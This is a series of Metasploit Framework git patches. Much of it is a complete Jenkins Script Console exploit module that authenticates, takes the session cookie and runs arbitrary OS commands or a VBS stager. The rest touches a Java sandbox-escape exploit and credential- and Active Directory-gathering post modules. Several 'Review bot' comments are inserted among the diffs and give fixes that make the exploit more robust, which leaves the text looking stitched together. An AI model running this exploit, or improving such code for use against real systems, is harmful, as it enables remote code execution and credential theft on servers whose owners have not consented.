b/external/source/exploits/cve-2012-5088/Exploit.java index 52045f39537d..4ad3005ad9bf 100755 --- a/external/source/exploits/cve-2012-5088/Exploit.java +++ b/external/source/exploits/cve-2012-5088/Exploit.java 
@@ -35,11 +35,11 @@ public void init() // convert it to a simple byte array buffer = bos.toByteArray(); - MethodHandles.Lookup localLookup = MethodHandles.publicLookup(); - MethodType localMethodType0 = MethodType.methodType(Class.class, String.class); - MethodHandle localMethodHandle0 = localLookup.findStatic(Class.class, "forName", localMethodType0); - Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" }); - Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" }); + MethodHandles.Lookup localLookup = MethodHandles.publicLookup(); + MethodType localMethodType0 = MethodType.methodType(Class.class, String.class); + MethodHandle localMethodHandle0 = localLookup.findStatic(Class.class, "forName", localMethodType0); + Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" }); + Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" }); MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class }); MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1); MethodType localMethodType2 = MethodType.methodType(Void.TYPE); diff --git a/modules/exploits/multi/browser/java_jre17_method_handle.rb b/modules/exploits/multi/browser/java_jre17_method_handle.rb index 89fd3db6fb7d..623bc31c8e22 100644 --- a/modules/exploits/multi/browser/java_jre17_method_handle.rb +++ b/modules/exploits/multi/browser/java_jre17_method_handle.rb 
@@ -41,7 +41,7 @@ def initialize( info = {} ) [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], - 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Payload' => { 'Space' => 20480, 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', @@ -70,7 +70,7 @@ def initialize( info = {} ) ], ], 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jan 10 2013' + 'DisclosureDate' => 'Oct 16 2012' )) end From 892899acd5733ac560a244b96ab95a2de40d8a8b Mon Sep 17 00:00:00 2001 From: Charles Smith Date: Thu, 17 Jan 2013 16:52:02 -0500 Subject: [PATCH 060/421] Fixed loot formatting so data is under the proper column The credentials table was defined with the columns "User", "Password", "Host", "Port", and "SSL". Credentials were not added in that order, however. They were added in the order "host, port, user, password, ssl" in this line: credentials << [cred['host'], cred['port'], cred['user'], cred['password'], cred['ssl']] I changed the order the columns were defined to fix this. The permissions table had a similar issue. The "FileWrite" column was missing, so I added it. I also moved the "Home" column to after the "AutoCreate" column. Now the line: permissions << [perm['host'], perm['user'], perm['dir'], perm['fileread'], perm['filewrite'], perm['filedelete'], perm['fileappend'],perm['dircreate'], perm['dirdelete'], perm['dirlist'], perm['dirsubdirs'], perm['autocreate']] works correctly. --- .../post/windows/gather/credentials/filezilla_server.rb | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index a21ea3f81283..66da9f2113a0 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb 
@@ -89,10 +89,10 @@ def get_filezilla_creds(paths) 'Indent' => 1, 'Columns' => [ - "User", - "Password", "Host", "Port", + "User", + "Password", "SSL" ]) @@ -105,14 +105,15 @@ def get_filezilla_creds(paths) "User", "Dir", "FileRead", + "FileWrite", "FileDelete", "FileAppend", "DirCreate", "DirDelete", "DirList", "DirSubdirs", - "Home", - "AutoCreate" + "AutoCreate", + "Home" ]) configuration = Rex::Ui::Text::Table.new( From e613c860a500ff4f37f5f315e750f517b4c0da20 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Thu, 17 Jan 2013 23:17:14 +0100 Subject: [PATCH 061/421] Added Name and Emailadress --- modules/auxiliary/scanner/http/wordpress_pingback_access.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb index 83dde3257ea1..368cb189564e 100644 --- a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb +++ b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb @@ -24,7 +24,7 @@ def initialize(info = {}) [ 'Thomas McCarthy "smilingraccoon" ', 'Brandon McCann "zeknox" ' , - 'FireFart' # Original PoC + 'Christian Mehlmauer "FireFart" ' # Original PoC ], 'License' => MSF_LICENSE, 'References' => From 3465aa00bd10d42391810dab49c6a91e85bc55b8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 18 Jan 2013 18:42:27 +0100 Subject: [PATCH 062/421] title updated --- .../browser/java_jre17_glassfish_averagerangestatisticimpl.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb index 72e5c67f3672..bae9abf58a4e 100644 --- a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb +++ b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb 
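Review bot: After the second hunk the permissions column list ends with `"AutoCreate", "Home"`, but the row quoted in the commit message stops at `perm['autocreate']`, so the `Home` header has no field behind it. If the list also opens with a host column above the hunk (not visible here), that is one more header than the row has fields, which will misalign the table or be rejected when the row is added, depending on how the table checks row width. Either append the home-directory flag to the row, if the parser collects one, or drop the `"Home"` column. The table definition begins and the rows are built outside this hunk, so both ends need checking against the full file.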
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize( info = {} ) super( update_info( info, - 'Name' => 'Java Applet JMX Remote Code Execution', + 'Name' => 'Java Applet AverageRangeStatisticImpl Remote Code Execution', 'Description' => %q{ This module abuses the AverageRangeStatisticImpl from a Java Applet to run arbitrary Java code outside of the sandbox, a different exploit vector than the one From 9f7aafccdfeda0deed1f4252b9da02067d64937f Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Fri, 18 Jan 2013 14:56:52 -0500 Subject: [PATCH 063/421] add module to execute commands via Jenkins Script Console --- .../multi/http/jenkins_script_console.rb | 146 ++++++++++++++++++ 1 file changed, 146 insertions(+) create mode 100644 modules/exploits/multi/http/jenkins_script_console.rb diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb new file mode 100644 index 000000000000..bd4614cfc6aa --- /dev/null +++ b/modules/exploits/multi/http/jenkins_script_console.rb 
@@ -0,0 +1,146 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStagerVBS + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Jenkins Script-Console Java Execution', + 'Description' => %q{ + This module uses the Jenkins Groovy script console to execute + OS commands using Java. + }, + 'Author' => + [ + 'Spencer McIntyre', + 'jamcut' + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: $', + 'DefaultOptions' => + { + 'WfsDelay' => '10', + }, + 'References' => + [ + ['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console'] + ], + 'Targets' => + [ + ['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win'}], + ['Unix', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}], + ], + 'DisclosureDate' => 'Jan 18 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]), + OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]), + OptString.new('PATH', [ true, 'The path to jenkins', '/jenkins' ]), + ], self.class) + end + + def check + res = send_request_cgi({'uri' => "#{datastore['PATH']}/login"}) + if res and res.headers.include?('X-Jenkins') + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + def http_send_command(cmd, opts = {}) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => datastore['PATH'] + '/script', + 'cookie' => @cookie, + 'vars_post' => + { + 'script' => java_craft_runtime_exec(cmd), + 'Submit' => 'Run' + } + }) + if not (res and res.code == 200) + 
fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.') + end + end + + def java_craft_runtime_exec(cmd) + decoder = Rex::Text.rand_text_alpha(5, 8) + decoded_bytes = Rex::Text.rand_text_alpha(5, 8) + cmd_array = Rex::Text.rand_text_alpha(5, 8) + jcode = "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n" + jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n" + + jcode << "String [] #{cmd_array} = new String[3];\n" + if target['Platform'] == 'win' + jcode << "#{cmd_array}[0] = \"cmd.exe\";\n" + jcode << "#{cmd_array}[1] = \"/c\";\n" + else + jcode << "#{cmd_array}[0] = \"/bin/sh\";\n" + jcode << "#{cmd_array}[1] = \"-c\";\n" + end + jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n" + jcode << "Runtime.getRuntime().exec(#{cmd_array});\n" + jcode + end + + def execute_command(cmd, opts = {}) + http_send_command("#{cmd}") + end + + def exploit + print_status('Checking access to the script console') + res = send_request_cgi({'uri' => "#{datastore['PATH']}/script"}) + if not (res and res.code) + fail_with(Exploit::Failure::Unknown) + end + + sessionid = 'JSESSIONID=' << res.headers['set-cookie'].split('JSESSIONID=')[1].split('; ')[0] + @cookie = "#{sessionid}" + + if res.code != 200 + print_status('Logging in...') + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => datastore['PATH'] + '/j_acegi_security_check', + 'cookie' => @cookie, + 'vars_post' => + { + 'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'), + 'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'), + 'Submit' => 'log in' + } + }) + + if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/ + fail_with(Exploit::Failure::NoAccess, 'login failed') + end + else + print_status('No authentication required, skipping login...') + end + + case target['Platform'] + when 'win' + print_status("#{rhost}:#{rport} - Sending VBS stager...") + 
execute_cmdstager({:linemax => 2049}) + + when 'unix' + print_status("#{rhost}:#{rport} - Sending payload...") + http_send_command("#{payload.encoded}") + end + + handler + end +end From bfd58e95707dcfc8e2ad9a661ba94bb0fb2fe443 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Fri, 18 Jan 2013 14:59:41 -0600 Subject: [PATCH 064/421] Add a comment doc for future parser writers --- lib/rex/parser/unattend.rb | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/lib/rex/parser/unattend.rb b/lib/rex/parser/unattend.rb index f760410c3fdf..09989418a25e 100644 --- a/lib/rex/parser/unattend.rb +++ b/lib/rex/parser/unattend.rb @@ -3,6 +3,12 @@ module Rex module Parser + +# This is a parser for the Windows Unattended Answer File +# format. It's used by modules/post/windows/gather/enum_unattend.rb +# and uses REXML (as opposed to Nokogiri) for its XML parsing. +# See: http://technet.microsoft.com/en-us/library/ff715801 +# http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx class Unattend def self.parse(xml) From 9f42abdb9545f340ae8e1dd1d9bd749cdddfa997 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Fri, 18 Jan 2013 15:44:52 -0600 Subject: [PATCH 065/421] Whitespace fixup --- .../ui/console/command_dispatcher/stdapi/sys.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 6c05cb89c059..782a206a3fbb 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb 
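Review bot: In `exploit`, the session id is extracted with `res.headers['set-cookie'].split('JSESSIONID=')[1].split('; ')[0]` without checking that the header is present or contains `JSESSIONID=`, so a response without that cookie raises NoMethodError on nil instead of ending in a reported failure. Guard it first, for example `fail_with(Exploit::Failure::Unknown, 'No JSESSIONID cookie in response') unless res.headers['set-cookie'].to_s.include?('JSESSIONID=')`. The `fail_with(Exploit::Failure::Unknown)` a few lines above is also called without a message, which leaves the operator with no indication of what failed. Separately, `j_username` and `j_password` are passed through `Rex::Text.uri_encode` before going into `vars_post`; if `vars_post` encodes its values as well, credentials with special characters would be encoded twice, which is worth verifying.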
@@ -38,14 +38,14 @@ class Console::CommandDispatcher::Stdapi::Sys # @@reboot_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu." ], - "-f" => [ true, "Force a reboot, valid values [1|2]" ]) + "-f" => [ true, "Force a reboot, valid values [1|2]" ]) # # Options used by the 'shutdown' command. # @@shutdown_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu." ], - "-f" => [ true, "Force a shutdown, valid values [1|2]" ]) + "-f" => [ true, "Force a shutdown, valid values [1|2]" ]) # # Options used by the 'reg' command. @@ -330,7 +330,7 @@ def cmd_kill_help # @param pids [Array] The pids to validate # @param allow_pid_0 [Boolean] whether to consider a pid of 0 as valid # @param allow_session_pid [Boolean] whether to consider a pid = the current session pid as valid - # @return [Array] Returns an array of valid pids + # @return [Array] Returns an array of valid pids def validate_pids(pids, allow_pid_0 = false, allow_session_pid = false) @@ -797,7 +797,7 @@ def cmd_suspend(*args) return true end - continue = args.delete("-c") || false + continue = args.delete("-c") || false resume = args.delete("-r") || false # validate all the proposed pids first so we can bail if one is bogus From 4ee80e76bdffcfd4ce9decb7c64c3941bb5d9e01 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Sat, 19 Jan 2013 23:15:20 +0000 Subject: [PATCH 066/421] msftidy wldap32 --- .../stdapi/railgun/def/def_wldap32.rb | 208 +++++++++--------- 1 file changed, 104 insertions(+), 104 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb index 93a26496ee0f..9dae48a0a89d 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb 
@@ -1,104 +1,104 @@ -# -*- coding: binary -*- -module Rex -module Post -module Meterpreter -module Extensions -module Stdapi -module Railgun -module Def - -class Def_wldap32 - - def self.create_dll(dll_path = 'wldap32') - dll = DLL.new(dll_path, ApiConstants.manager) - - dll.add_function('ldap_sslinitA', 'DWORD',[ - ['PCHAR', 'HostName', 'in'], - ['DWORD', 'PortNumber', 'in'], - ['DWORD', 'secure', 'in'] - ]) - - dll.add_function('ldap_bind_sA', 'DWORD',[ - ['DWORD', 'ld', 'in'], - ['PCHAR', 'dn', 'in'], - ['PCHAR', 'cred', 'in'], - ['DWORD', 'method', 'in'] - ]) - - dll.add_function('ldap_search_sA', 'DWORD',[ - ['DWORD', 'ld', 'in'], - ['PCHAR', 'base', 'in'], - ['DWORD', 'scope', 'in'], - ['PCHAR', 'filter', 'in'], - ['PCHAR', 'attrs[]', 'in'], - ['DWORD', 'attrsonly', 'in'], - ['PDWORD', 'res', 'out'] - ]) - - dll.add_function('ldap_count_entries', 'DWORD',[ - ['DWORD', 'ld', 'in'], - ['DWORD', 'res', 'in'] - ]) - dll.add_function('ldap_first_entry', 'DWORD',[ - ['DWORD', 'ld', 'in'], - ['DWORD', 'res', 'in'] - ]) - - dll.add_function('ldap_next_entry', 'DWORD',[ - ['DWORD', 'ld', 'in'], - ['DWORD', 'entry', 'in'] - ]) - - dll.add_function('ldap_first_attributeA', 'DWORD',[ - ['DWORD', 'ld', 'in'], - ['DWORD', 'entry', 'in'], - ['DWORD', 'ptr', 'in'] - ]) - - dll.add_function('ldap_next_attributeA', 'DWORD',[ - ['DWORD', 'ld', 'in'], - ['DWORD', 'entry', 'in'], - ['DWORD', 'ptr', 'inout'] - ]) - - dll.add_function('ldap_count_values', 'DWORD',[ - ['DWORD', 'vals', 'in'], - ]) - - dll.add_function('ldap_get_values', 'DWORD',[ - ['DWORD', 'ld', 'in'], - ['DWORD', 'entry', 'in'], - ['PCHAR', 'attr', 'in'] - ]) - - dll.add_function('ldap_value_free', 'DWORD',[ - ['DWORD', 'vals', 'in'], - ]) - - dll.add_function('ldap_memfree', 'VOID',[ - ['DWORD', 'block', 'in'], - ]) - - dll.add_function('ber_free', 'VOID',[ - ['DWORD', 'pBerElement', 'in'], - ['DWORD', 'fbuf', 'in'], - ]) - - dll.add_function('LdapGetLastError', 'DWORD',[]) - - 
dll.add_function('ldap_err2string', 'DWORD',[ - ['DWORD', 'err', 'in'] - ]) - - dll.add_function('ldap_msgfree', 'DWORD', [ - ['DWORD', 'res', 'in'] - ]) - - return dll - end - -end - -end; end; end; end; end; end; end - - +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Stdapi +module Railgun +module Def + +class Def_wldap32 + + def self.create_dll(dll_path = 'wldap32') + dll = DLL.new(dll_path, ApiConstants.manager) + + dll.add_function('ldap_sslinitA', 'DWORD',[ + ['PCHAR', 'HostName', 'in'], + ['DWORD', 'PortNumber', 'in'], + ['DWORD', 'secure', 'in'] + ]) + + dll.add_function('ldap_bind_sA', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['PCHAR', 'dn', 'in'], + ['PCHAR', 'cred', 'in'], + ['DWORD', 'method', 'in'] + ]) + + dll.add_function('ldap_search_sA', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['PCHAR', 'base', 'in'], + ['DWORD', 'scope', 'in'], + ['PCHAR', 'filter', 'in'], + ['PCHAR', 'attrs[]', 'in'], + ['DWORD', 'attrsonly', 'in'], + ['PDWORD', 'res', 'out'] + ]) + + dll.add_function('ldap_count_entries', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'res', 'in'] + ]) + dll.add_function('ldap_first_entry', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'res', 'in'] + ]) + + dll.add_function('ldap_next_entry', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'entry', 'in'] + ]) + + dll.add_function('ldap_first_attributeA', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'entry', 'in'], + ['DWORD', 'ptr', 'in'] + ]) + + dll.add_function('ldap_next_attributeA', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'entry', 'in'], + ['DWORD', 'ptr', 'inout'] + ]) + + dll.add_function('ldap_count_values', 'DWORD',[ + ['DWORD', 'vals', 'in'], + ]) + + dll.add_function('ldap_get_values', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'entry', 'in'], + ['PCHAR', 'attr', 'in'] + ]) + + dll.add_function('ldap_value_free', 'DWORD',[ + ['DWORD', 'vals', 'in'], + ]) + + dll.add_function('ldap_memfree', 'VOID',[ + ['DWORD', 'block', 'in'], + 
]) + + dll.add_function('ber_free', 'VOID',[ + ['DWORD', 'pBerElement', 'in'], + ['DWORD', 'fbuf', 'in'], + ]) + + dll.add_function('LdapGetLastError', 'DWORD',[]) + + dll.add_function('ldap_err2string', 'DWORD',[ + ['DWORD', 'err', 'in'] + ]) + + dll.add_function('ldap_msgfree', 'DWORD', [ + ['DWORD', 'res', 'in'] + ]) + + return dll + end + +end + +end; end; end; end; end; end; end + + From 771baa3181f71bdb077bd4de5105b8c2649ded82 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Sat, 19 Jan 2013 23:23:45 +0000 Subject: [PATCH 067/421] Added x64 check and options to info --- .../post/windows/gather/enum_ad_computers.rb | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index caf0278fd2cf..65bd062e4b2c 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -18,6 +18,18 @@ def initialize(info={}) 'Name' => 'Windows Gather AD Enumerate Computers', 'Description' => %q{ This module will enumerate computers in the default AD directory. + + Optional Attributes: + objectClass, cn, description, distinguishedName, instanceType, whenCreated, + whenChanged, uSNCreated, uSNChanged, name, objectGUID, + userAccountControl, badPwdCount, codePage, countryCode, + badPasswordTime, lastLogoff, lastLogon, localPolicyFlags, + pwdLastSet, primaryGroupID, objectSid, accountExpires, + logonCount, sAMAccountName, sAMAccountType, operatingSystem, + operatingSystemVersion, operatingSystemServicePack, serverReferenceBL, + dNSHostName, rIDSetPreferences, servicePrincipalName, objectCategory, + netbootSCPBL, isCriticalSystemObject, frsComputerReferenceBL, + lastLogonTimestamp, msDS-SupportedEncryptionTypes }, 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell ' ], 
@@ -39,6 +51,11 @@ def read_value(addr) end def run + if sysinfo["Architecture"] =~ /x64/i + print_error("Does not work in x64 see: http://dev.metasploit.com/redmine/issues/7639"); + return + end + print_status("Connecting to default LDAP server") session_handle = bind_default_ldap_server From 6b40011a6f2e9f0d47264b03eb5d528378010e4c Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Sat, 19 Jan 2013 19:10:56 -0500 Subject: [PATCH 068/421] use target_uri and normalize_uri as well as fix a cookie problem --- .../multi/http/jenkins_script_console.rb | 39 ++++++++++--------- 1 file changed, 21 insertions(+), 18 deletions(-) diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index bd4614cfc6aa..1033999726bb 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -26,7 +26,6 @@ def initialize(info = {}) 'jamcut' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: $', 'DefaultOptions' => { 'WfsDelay' => '10', @@ -45,14 +44,17 @@ def initialize(info = {}) register_options( [ - OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]), - OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]), - OptString.new('PATH', [ true, 'The path to jenkins', '/jenkins' ]), + OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]), + OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]), + OptString.new('TARGETURI', [ true, 'The path to jenkins', '/jenkins/' ]), ], self.class) end def check - res = send_request_cgi({'uri' => "#{datastore['PATH']}/login"}) + uri = target_uri + uri.path = normalize_uri(uri.path) + uri.path << "/" if uri.path[-1, 1] != "/" + res = send_request_cgi({'uri' => "#{uri.path}login"}) if res and res.headers.include?('X-Jenkins') return Exploit::CheckCode::Detected else 
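Review bot: In jenkins_script_console.rb, the path handling added to `check` (`uri = target_uri`, `uri.path = normalize_uri(uri.path)`, then appending `/`) is written out a second time in `exploit` with `@uri` in the `@@ -101,21 +104,19 @@` hunk, so the two copies can drift apart. `http_send_command` also now depends on `@uri` having been set by `exploit` first. A private helper that returns the normalised base path with its trailing slash would give one place to change and remove the hidden ordering dependency; call sites would then read `'uri' => "#{base_path}login"` and `'uri' => "#{base_path}script"`. The closing lines of `check` fall outside this hunk.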
@@ -61,16 +63,17 @@ def check end def http_send_command(cmd, opts = {}) - res = send_request_cgi({ + request_parameters = { 'method' => 'POST', - 'uri' => datastore['PATH'] + '/script', - 'cookie' => @cookie, + 'uri' => "#{@uri.path}script", 'vars_post' => { 'script' => java_craft_runtime_exec(cmd), 'Submit' => 'Run' } - }) + } + request_parameters['cookie'] = @cookie if @cookie != nil + res = send_request_cgi(request_parameters) if not (res and res.code == 200) fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.') end @@ -101,21 +104,19 @@ def execute_command(cmd, opts = {}) end def exploit + @uri = target_uri + @uri.path = normalize_uri(@uri.path) + @uri.path << "/" if @uri.path[-1, 1] != "/" print_status('Checking access to the script console') - res = send_request_cgi({'uri' => "#{datastore['PATH']}/script"}) - if not (res and res.code) - fail_with(Exploit::Failure::Unknown) - end - - sessionid = 'JSESSIONID=' << res.headers['set-cookie'].split('JSESSIONID=')[1].split('; ')[0] - @cookie = "#{sessionid}" + res = send_request_cgi({'uri' => "#{@uri.path}script"}) + fail_with(Exploit::Failure::Unknown) if not res + @cookie = nil if res.code != 200 print_status('Logging in...') res = send_request_cgi({ 'method' => 'POST', - 'uri' => datastore['PATH'] + '/j_acegi_security_check', - 'cookie' => @cookie, + 'uri' => "#{@uri.path}j_acegi_security_check", 'vars_post' => { 'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'), @@ -127,6 +128,8 @@ def exploit if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/ fail_with(Exploit::Failure::NoAccess, 'login failed') end + sessionid = 'JSESSIONID' << res.headers['set-cookie'].split('JSESSIONID')[1].split('; ')[0] + @cookie = "#{sessionid}" else print_status('No authentication required, skipping login...') end From 567185ec6583c69c0c6aa82f846b6abab93c4539 Mon Sep 17 00:00:00 2001 
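Review bot: The cookie extraction added after the login check in the `@@ -127,6 +128,8 @@` hunk, `res.headers['set-cookie'].split('JSESSIONID')[1].split('; ')[0]`, raises NoMethodError when the 302 response has no Set-Cookie header or no JSESSIONID in it, because either the header value or the `[1]` element is nil. An explicit failure is easier to diagnose than a stack trace: take the value with `cookie = res.headers['set-cookie'].to_s[/JSESSIONID[^;]*/]` and call `fail_with(Exploit::Failure::UnexpectedReply, 'No session cookie in login response')` when it is nil. In the same commit, `@cookie != nil` in `http_send_command` can be written as `if @cookie`. `exploit` starts and ends outside this hunk.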
From: Meatballs1 Date: Sun, 20 Jan 2013 00:19:17 +0000 Subject: [PATCH 069/421] Better cleanup and address comments --- .../stdapi/railgun/def/def_wldap32.rb | 3 + .../post/windows/gather/enum_ad_computers.rb | 64 +++++++++++-------- 2 files changed, 40 insertions(+), 27 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb index 9dae48a0a89d..6716b24f95a5 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb @@ -94,6 +94,9 @@ def self.create_dll(dll_path = 'wldap32') ['DWORD', 'res', 'in'] ]) + dll.add_function('ldap_unbind', 'DWORD', [ + ['DWORD', 'ld', 'in'] + ]) return dll end diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 65bd062e4b2c..3c923875a9cc 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb 
@@ -51,39 +51,32 @@ def read_value(addr) end def run - if sysinfo["Architecture"] =~ /x64/i - print_error("Does not work in x64 see: http://dev.metasploit.com/redmine/issues/7639"); + unless session.platform == "x64/win64" + print_error("Does not work in x86 see: http://dev.metasploit.com/redmine/issues/7639"); return end print_status("Connecting to default LDAP server") session_handle = bind_default_ldap_server - if session_handle == 0 - return - end + return false unless session_handle print_status("Querying default naming context") - defaultNamingContext = query_ldap(session_handle, "", 0, "(objectClass=computer)", ["defaultNamingContext"])[0]['attributes'][0]['values'] + + query_result = query_ldap(session_handle, "", 0, "(objectClass=computer)", ["defaultNamingContext"]) + first_entry_attributes = query_result[0]['attributes'] + defaultNamingContext = first_entry_attributes[0]['values'] # Value from First Attribute of First Entry + print_status("Default Naming Context #{defaultNamingContext}") attributes = datastore['ATTRIBS'].split(',') - #attributes = [ 'objectClass','cn', 'description', 'distinguishedName','instanceType','whenCreated', - # 'whenChanged','uSNCreated','uSNChanged','name','objectGUID', - # 'userAccountControl','badPwdCount','codePage','countryCode', - # 'badPasswordTime','lastLogoff','lastLogon','localPolicyFlags', - # 'pwdLastSet','primaryGroupID','objectSid','accountExpires', - # 'logonCount','sAMAccountName','sAMAccountType','operatingSystem', - # 'operatingSystemVersion','operatingSystemServicePack','serverReferenceBL', - # 'dNSHostName','rIDSetPreferences','servicePrincipalName','objectCategory', - # 'netbootSCPBL','isCriticalSystemObject','frsComputerReferenceBL', - # 'lastLogonTimestamp','msDS-SupportedEncryptionTypes' - # ] - print_status("Querying computer objects - Please wait...") results = query_ldap(session_handle, defaultNamingContext, 2, "(objectClass=computer)", attributes) + print_status("Unbinding from LDAP service.") + 
